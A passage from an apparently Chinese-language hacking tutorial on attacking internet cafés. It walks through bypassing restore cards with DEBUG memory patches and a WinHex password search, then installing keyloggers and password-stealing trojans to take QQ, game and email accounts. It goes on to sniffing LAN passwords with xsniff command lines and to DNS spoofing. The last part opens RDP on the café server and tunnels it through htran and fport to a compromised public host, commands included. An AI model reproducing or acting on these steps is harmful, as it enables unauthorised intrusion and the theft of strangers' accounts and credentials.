然后输入t回车，不断的重复，直到显示的地址形如 F000:xxxx

　　,后面的指令为:mov dl,80 (练练眼力-。按q退出.

　　记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。

　　例如俺的得到的地址是F000:9A95

　　再次运行debug ,键入:

　　-e 0:4c 95 9A 00 F0 e的作用将数据表"95 9A 00 f0",写入地址0:4c开始的字节中.

　　-q

　　注： 填的时候要仔细，填错的话会死机。ok,破解完成.

　　这时在提示符c:\键入

　　c:\win

　　进入windows系统即可,那么这次你在windows系统中的一切(商周)作,随着下一次

　　的启动都会被还原卡存储起来。

　　这种办法大家都知道，不过操作起来也有点危险，弄不好启动不了。而且win2000没有dos环境,到底性不行呢？呵呵，我还没有做这个危险的尝试。不过望上有很多关于破解还原卡的工具可以下载，到底什么工具最好使，大家自己测试。

　　至于还原卡，网上有密码读取器，不过着工具只能在win98下面使用。在win2k下面我们可以用winhex来破解，次方法很奏效，

　　应该是最好的办法。先随便输个错误的密码，弹出错误窗口后不动，用winhex查找主要内存，找到还原精灵，再搜索我们开始

　　输的错误密码。在错误密码的旁边应该就有正确的密码。我们输入正确的密码转存就行了。这里很简单，就不截图了！

　　至于冰点还原，好像还没有破解办法，这个的确很厉害。不过他有个选项，就是重启多少次后不还原，没事你可以多重启试一下，别把机子整坏了就行。

　　破了还原后就装木马了。我们最好装键盘记录或密码截获木马，盗qq，游戏账号，邮箱账号等等。比如密码结巴等工具，也可以

　　把浏览器默认主页设置为你的网页木马。如果网吧的默认主页都是一样，而你有能力入侵了那个网站，在默认主页上挂马那更好！

　　三.网吧嗅探。

　　如果你想知道网吧某个mm的qq号，那你就用QQSniffer,Ver2005build5.5。也可以用xniffer,用于嗅探域网中或本机的pop.smtp.ftp等明文传输的tcp/ip协议密码。格式是 xsiff.exe -pass -hide -log pass.log xsiff.exe -tcp -udp -asc -addr 192.168.1.1。如果你不喜欢着个，还有个密码监听器，密码监听器用于监听网页的密码，包括网页上的邮箱、论坛、聊天室等等。只需在一台电脑上运行，就可以监听局域网内任意一台电脑登录的账号和密码，并将密码显示、保存，或发送到用户指定的邮箱。我就经常有密码监听器2.4破解版在网吧监听别人

　　密码！当然网吧最适合dns欺骗！

　　四.端口转发。

　　为了能随时随地控制网吧机器，在家也可以！我们最好来个端口转发。首先我们可以用fport.exe(这个工具在angelshell1.0包里面有）,格式为fport 但是使用他可以不必安装后门，只需要普通的权限即可执行。网吧服务器一般是win2000server版的，我们趁管理员不注意，给他开3389。如果他的ip为192.168.0.1，我们就在他的命令行下执行fport.exe 3389 myip 9999,这里的myip可以是我们的一只有公网ip的肉鸡。我们再在公网ip的肉鸡上运行FportClient.exe着个是客户端。着样我们登陆公网ip的肉鸡的9999端口就进了网吧主机。在上面看第电影赶什么都行，不被发现就行了，我们动作轻点就行了。我们也可以给网吧主机装代理。就用htran2.4,SocksCap。在网吧主机命令行下上执行htran.exe -install （安装Socks5服务），htran.exe -start （启动Socks5服务），再执行"htran.exe -s -connect 共网肉鸡ip 3389。在自己的共网肉鸡上执行htran.exe -s -listen 3389 5200（监听端口）.现在用SocksCap连接 218.3.1.1 的5200端口，就等于进入了网吧主机。我们也可以用vidc来映射端口，这个和fport差不多就不多说了。